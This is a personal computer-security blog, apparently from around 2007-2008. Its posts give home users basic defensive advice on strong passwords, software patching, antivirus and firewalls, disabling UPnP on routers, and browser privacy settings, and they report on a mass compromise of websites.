Computer Security Weblog

A common question I ask when giving presentations on computer security, I ask how many people have changed their password for the personal e-mail accounts in the past year.  In the corporate world, you can control how often a user has to change their corporate password at work.  Most answers I get back from the question about their personal password on their e-mail accounts is that they never have or maybe one time they did a couple of years ago.

Now lets think about an attacker who compromises your home PC.  He has a keylogger (a program that records a users keystrokes and sends them back to an attackers evil server) and they have recorded you typing your personal e-mail account.  OK, now lets think.  If you happen to bank at a large national bank, you have a PayPal account, you have an eBay account and many other common online accounts that a criminal attacker might be able to take over for his nefarious activities.  Do you have user name and passwords that are common to your personal e-mail account?  Am I making you think about changing your password and using different user names and passwords for other accounts?  Hopefully so.

Lesson learned here is to change your password and don’t share user names and passwords with other financial accounts that you might have.  Think about using a strong password by using upper, lower, numbers and special characters to create a strong password.  Use a password that is actually longer than 8 positions long.  Use something like a pass phrase that will be easier for you to remember.

Hope everyone’s weekend is going great and stay safe out there.

This week, another cyber attack against legitimate sites is going on.  Some of the security companies have been writing some articles about it.  Not a whole lot of details are known at this time but some of the sites include several .edu’s, .gov’s, and of course there is always the big names.  In this instance, it was Trend Micro.  A computer security company.  They’ve taken care of the pages that were hacked.   Similar to the other attacks earlier this year,  the web applications themselves have been attacked then serve up exploits to any visitor to that site.

In an Internet Storm Center Diary post lists what vulnerabilities that are being used in this latest attack.  What do you to defend against these types of attacks?  Well, regular readers have heard it from me before but the answer is the same.  PATCH!!!!!   Pretty simple.  The weaknesses listed in this current post are all Microsoft patches from 2006 and 2007.  Not listed but are used more often are some of the third party applications like Adobe Reader, RealPlayer, WinZip, WinAmp, and on and on and on.  These applications need patches too so don’t forget those.

It’s Big 12 tournament has started so I’m pumped up.  Rock Chalk Jayhawk.  GO KU!  That is it for now.  Have a great weekend and may your favorite team win unless they are playing the Kansas Jayhawks!!

With the latest JavaScript attacks that we’ve been seeing, it now is very important that you take steps that will protect you from all the criminal attackers that try to take advantage of you.  You had the uc8010 attacks, then you had the webservers that were being compromised and any website hosted on that webserver was spreading their crimeware to all who visited.  I’ve written about both attacks.

So what to do?   It sometimes is like a broken record but I’ll repeat it hear.  Patching your software is important.  Very important.  What tools can you use?  Well try Shavliks Google Gadget.  Click here to get this great tool.  Many of the attacks are against known vulnerabilities.  Knowing what applications you have that need patching is one of the most important things you can do.  You can’t defend yourself against 0-Day attacks (there is no patch for the vulnerability) but this will go along way to protect yourself.

Up to date anti-virus and an up to date anti-malware applications.  I use AVG’s AV and anti-malware.  Keep the updates current.  Run these tools on your system so you can keep things clean.  Click here for these downloads.  Also install a more robust firewall.  I use the free version of Comodo Firewall.  Click here for your free download.

Be VERY careful when opening e-mails.  They may seem to be from someone you know, but you really need to be very careful about unsolicited e-mails asking for personal information.  Never give this private information out.  Don’t click on those links either.  They are already seeing Valentines malware, along with Super Bowl sites that are really malicious sites.  Then tax time is right around the corner and then comes Easter, and so on, and so on.  You get the point.  And be VERY careful when e-mails are sent telling you about recent world events like storms, assassinations, or current tragedies, don’t click on these types of links.

While we are at it, lets talk strong passwords.  You really ought to secure any of your financial sites with strong passwords where you use upper and lower case letters, numbers, and special characters.  A password of more than 8 characters would be a good idea too.

Use an alternative browser to Microsoft’s Internet Explorer.  I use the Firefox browser.  I added the NoScript addon as a defense against these latest attacks.  You have to actually do some work but in the long run, you’ll be safer.  This is no guarantee that you will stay safe but it goes a lot farther than not doing anything at all.

These are just a few things you can do.  Do them all and you will be safer.  I used to say stay away from porn and peer 2 peer downloading sites where you download music or movies illegally, and you will stay fairly safe.  With the latest JavaScript attacks, you can’t say that anymore.  So take these extra steps and it will keep you safer.

Stay safe, and take steps to protect yourself!

First things first.  Universal Plug and Play (UPnP) is a set of computer network protocols.  The goals of UPnP are to allow devices to connect seamlessly and to simplify the implementation of networks in the home and some corporate environments.  This is used for data sharing, communications, and entertainment.  I won’t go any further trying to explain it.  To be honest, I didn’t know much about it until I started reading about the problem with UPnP.  The problem is there is no authentication with UPnP.  OK, that isn’t good at all.  Why should you be concerned with this?  Well total pwnage is what we are talking about.  Some bad people can get control of your router which has horrible ramifications.  If you want to more on this subject,  Google UPnP and Computer Security to read additional information on this topic.

So here is what we have to do.  First things first.  How can we shut this off?  Well you probably have purchased a router that you use in your home.  One of the more popular devices is the Linksys WRT54G.  Netgear sells them as well as many others.  If you have never logged into your router, let me tell you how to do this.  Open up Microsoft’s Internet Explorer and type in the IP address assigned to your router.  Let’s say that you own a WRT54G from Linksys.  Linksys routers use 192.168.1.1 for their internal IP address. Enter the address ‘http://192.168.1.1′.  What you should be presented by is something like login screen that has a user name and password.  If you have never changed the default password on your router, this will be a good time to do that as well as turning off UPnP.  If you don’t know the default password, go here to find the default user name and password for your router.  This is great router resource.

Once you have logged on successfully, you will be presented with a web interface.  Normally on the left hand side of the page, you will see different areas you can check and change.  If you still have the default name and password, then change this immediately.  Then find where UPnP is turned on, and turn that bad boy off.  Then you can click on log off, remember your password that you set and don’t set it to a word in the dictionary.

Gnucitizen (A computer security researcher) has several postings since the first of the year on UPnP.  Check his blog out where he really breaks down the issues with UPnP.  His point is, TURN IT OFF!

Stay safe and stay warm.  I’m freezing where I am!  Rock Chalk Jayhawk GO KU!!

My previous post, I gave a quick review of this story, but due to some things in my professional life as a computer security professional, I’ve dug deeper and will try and explain in plain language.

On or around 4 January, there was an automated attack on thousands of websites. Initial reports were that 70,000 legitimate sites had been compromised, but now the number is estimated at 94,000 sites. These included Fortune 500 corporations, state government agencies, and schools. These sites were infected with malicious code that attempts to engage in click fraud and steal online game credentials from people who visit the destinations.

Here is a short list of sites that were known to be compromised. At this writing, some have been fixed. When talking about smaller organizations without dedicated staff to maintain their web applications, these probably remain compromised.

Computer Associates
United Nations
City of Cleveland
State of Virginia
Boston University

Additional sites that are found currently using a Google search:

webdeveloper-dot-com

bbc-dot-org

livingbeyondbreastcancer-dot-org

livingbeyondbreastcancer-dot-net

As many of us approach a new year, we like to make resolutions that we want to do in the coming year. Nothing should be different when it comes to computer security so I thought I would help you out. First things first. Please care about computer security. In this post, I will refer back to some of my prior posts that explain why you should care. It reminds me of the old joke. Doctor Doctor! It hurts when I do this!!! The Doctor said “Don’t do that!!!”. Computer security is kind of like that. You can tell people what to avoid and behaviors to do or not do, and they choose to ignore suggestions. Or you have kids who choose not to do what you tell them. So here it goes for my computer security resolutions.

1. Care about computer security. Bad guys would love to get control of your PC. Click here to see why.

2. Steps to take in 2008. Click here to see them.

3. Get smarter! I’ll try and help teach you what steps to take to not be a victim. Click here to see how.

4. Change passwords to a more secure password. Click here to see why.

5. Be careful when going mobile. If you have a laptop and travel, take caution when connecting to wireless AP’s. Click here to see why.

6. Change your Internet behavior. Click here to see what I mean.

If you can’t tell, I am rather passionate about what I do for a living. If I can help someone not have their ID stolen or credit card information stolen, I would feel much better. Hopefully this outlet has allowed me to help you some this year. I hope you will continue to read my posts. I will try and keep them current and yes I’ll probably repeat myself on certain topics. It is because the bad guys are always looking for a way to entice you to click on some attachment or a link in an unsolicited e-mail. Please let me know if you find this information helpful. I think one of the most popular posts I have made is how to find the SSID on a wireless router.

Stay safe this New Years Eve and have fun. I talk some about my KC Chiefs and well all I can tell you is I’m glad this season is almost over. My Kansas University Jayhawks are in the Orange Bowl on January 3. We are really starting to get into the heart of the NCAA Basket ball season and my Hawks are ranked number 3 right now. They look good. I’m looking forward to another great year so stay safe while online and we’ll talk again after the New Year!

Hi. It’s been a few days since my last post. In my part of the world, we had a pretty bad ice storm and power was knocked out and my internet connection was out for a few days. It’s snowing now so I’m really in a Winter Wonderland!

In a previous post, I mentioned that Apple’s QuickTime had a security problem that had no patch. Well late Thursday, Apple released a new version of QuickTime. So if your Apple Updater software hasn’t notified you that there is a new version, just open up QuickTime and you will be notified that there is a new version 7.3.1. Update it now. This is a vulnerability that is going around in the wild. That means that bad people are sending spam e-mail right now with malformed QuickTime files and if they trick you into clicking, they can do bad things. Anytime you hear the words remote code execution associated with a vulnerability, that means the bad people can run their bad programs and do bad stuff to your PC like add keyloggers, steal cookies, steal files, and that should scare you into patching your software. If you are an iTunes person, just grab the iTunes download because QuickTime comes with iTunes.

Just remember as the Holiday season comes in, bad people send many different types of spam e-mails from e-cards to more official things like you’ve changed your password on PayPal, to your financial institution wanting you to click on a link inside and e-mail and have you type your banking credentials so they can steal you blind.

Play it smart. Remember NEVER trust e-mails. Always question before you go and type in account numbers, passwords, pin numbers, etc.. Stay safe and if you are in the middle of the country, drive safely. That is all for now. I’ll try and post another story prior to Monday.

Halloween is over and it is now November 1, 2007.  I love this time of year.  The weather starts to cool down and I love Thanksgiving and Christmas time.  Remember you must stay alert when surfing the Internet though.  It has mentioned more than once by me and you can read what other computer security professionals say it also.  Your behavior has a huge impact on if you fall prey to an attackers every changing methods.  Let’s say, you have for some reason lost all sense and you’ve opened an e-mail up that really perks your interest and low and behold, you get malicious programs downloaded to your PC and now a remote attacker in Russia has complete control of your PC.  And let’s say one of the programs that an attacker has installed will read “files of interest”, what do you think those would be?

Well let’s review what we do on the PC.  Do we keep bank account information on your PC or do you bank online?  Is the setting on the browser you use allow you to save user id’s and passwords for convenience?  If your browser asks you if you would like to save that password you just entered for a certain page, and you have saved your logon credentials for say, PayPal, your bank, investment accounts, or any other financial institution, this would be a file that an attacker would find attractive.  How about this.  Do you prepare your own taxes?  Do you probably use one of the most popular tax preparation applications called Turbo Tax?  Those files are saved with certain file extensions that an attacker could find.  What type of information is in those tax files….just about everything someone would need to perform a little identity theft.

Here are some settings I have my browser set to for a little more safety.  I don’t save passwords.  Not a good idea.  I also set my Firefox browser to delete cookie files and other history files as soon as I close my browser.  Don’t save any of those files that an attacker would find valuable.  Back those up to a CD and keep them in a safe place.  If you use Firefox, go to Tools|Options then click on the privacy tab.  In the top section under History, uncheck 3 boxes and set the number of days you keep history to 0.  On the next section down under Cookies, check the accepting of cookies and on keep until option to when you close Firefox.  On the bottom section under Private Data, check the box that says to clear your private data and uncheck the next box that says to warn you before you delete these files.  Then go to the Security tab and check the first 2 boxes that says to warn you if a site trys to install an add-on and tell me if I go to a known forged site and click on the first radio button that says.  In the middle section under Passwords, uncheck the first box.  This is the one that asks if you want to save user id’s and passwords.

If you use Microsoft Internet Explorer, or other browser, find the settings similar to the Firefox settings and do the same for those browsers.  Or just switch now to Firefox and I’m sure you’ll be much happier.

These settings will gie an attacker less targets to go after if you do all this.  Go check the settings on the browser and start surfing smarter today.  Take care and hope you had a Happy Halloween.  Don’t eat too much candy.  I did and REALLY need to lose weight.  Rock Chalk Jayhawk go KU!!!

In the corporate world, companies can force you to follow certain rules. Some rules like making you use letters, both upper and lower case, special characters, and numbers, as well as the length of the password. When I ask people when was the last time they changed their passwords at home, the normal answer is they haven’t changed it for a long time or never.

Using passwords that are in the dictionary can be cracked very quickly. You must use strong passwords even at home. Think of all the web sites you have accounts set up and what the user ID and the passwords are. Is your e-mail ID and password the same on several of your accounts you have set up? The answer is probably yes. Attackers know this too and once they can obtain your e-mail and password, they may have the keys to bank accounts, PayPal credentials, stock accounts, and many others. Most of the time, the settings on browsers ask if you would like to save your sign on credentials. Never save your ID and passwords. When a PC can be hacked, attackers like to harvest files and these saved ID and password files is a favorite because they can lead the attacker to some financial gain at your expense.

Think about your ID and passwords and change them to a stronger password and make your ID something other than your e-mail address. Stay safe! Have a happy Halloween!!!

I just thought we could review the steps you can take to stay protected today. Several of these have been covered in more detail in other posts so this will be high level. If you see one on this list and it hasn’t been covered, we’ll just post a future article on the specific step.

1. Patch all software. This includes Microsoft as well as all others such as Apple, WinZip, WinAmp, RealPlayer, Macromedia, Adobe, and any other software you may have. Many of the patches companies issue are security patches.

2. Install anti-viurs and anti-spyware software, and keep the signatures current by downloading them daily and running them at least once a day if not multiple times.

3. If you have wireless, log onto your wireless access point and change the SSID from the default name, change the default user name if allowed and change the default password. Also do not broadcast your SSID, review the logs periodically on the router, use WPA2 for encryption, and use the MAC filtering option on the wireless AP.

4. Use an alternative browser instead of Microsoft Internet Explorer. I personally use Firefox.

5. If needed, change your Internet behavior. This includes knowing what types of social engineering tactics are being used and know how to avoid them. A useful resource for this is the link I have in my blogroll called the Internet Storm Center.

6. If you have kids, teach them the basics of Internet safety. Random clicking and trusting everyone is not safe and they must be told. Too much information on social networking sites is dangerous too so YOU the parent should audit what is being posted on Facebook, MySpace, and many of the other sites out there.

7. Instant messaging is used by kids and adults alike. Know you must patch these applications also and don’t reply to strangers. Don’t trust links from ‘friends’ all the time also. Sometimes friends get hacked and attackers send out either a malicious link to a web site that the attacker controls or may be an invite to view their webcam, or to view a picture. This is one of those social engineering tactics used by attackers.

8. At least once a year, especially if you have a college student with a PC connected to the college network, have a professional wipe the hard drive and reload the software, then download all the patches needed to get you caught up to current on patches. I recommend this for the family PC also.

9. If you have kids, purchase filtering software so you can limit what your kids can see. This can keep your kids from going to bad sites. (Porn)

10. Download and use a firewall. Pay attention to the alerts given and make sure you know what you are allowing.

11. Don’t surf porn or use Peer to Peer downloading sites to get movies and MP3 files for free. You may get more than you bargained for. This is a known avenue attackers use to spread their malware. It is also illegal to download copyrighted material.

12. Windows and other browsers allow you to ‘remember’ passwords. Think about it from an attackers point of view. These password files are stored on the hard drive and attackers know what they are called. If you get malicious software on your machine, attackers like to look for files of interest and the password files could contain financial account user id and passwords that they can use to gain access to your bank, investment account, etc.

13. Backup your files periodically. This includes your files you’ve purchased from iTunes as well as documents and family pictures you may have loaded on your PC’s hard drive.

14. Use strong passwords. Passwords from the dictionary can be cracked VERY quickly by password cracking programs. Use more than 8 characters and mix in upper and lower case, numbers, and special characters. A pass phrase is always good to use.

15. Set up and administrator account that you use for maintaining the PC, then create accounts that don’t have administrator privileges to use when surfing the net. Attackers trick you into installing their software and if you don’t have rights to do it, then this is another layer of protection.

16. Use the Finjan Firefox plugin so when you do searches, this can tell you if the site is safe or not.

This is a pretty good list. If there are any that I may have left off, I’ll add those to this list so you can review this posting or I’ll just add them to future postings. If we haven’t covered these steps yet in postings, I’ll cover them soon. If you ever have a question, don’t hesitate to ask and I’ll try and answer it to the best of my ability. Have a great weekend and ROCK CHALK JAYHAWK GO KU! Big game tonight in College Station.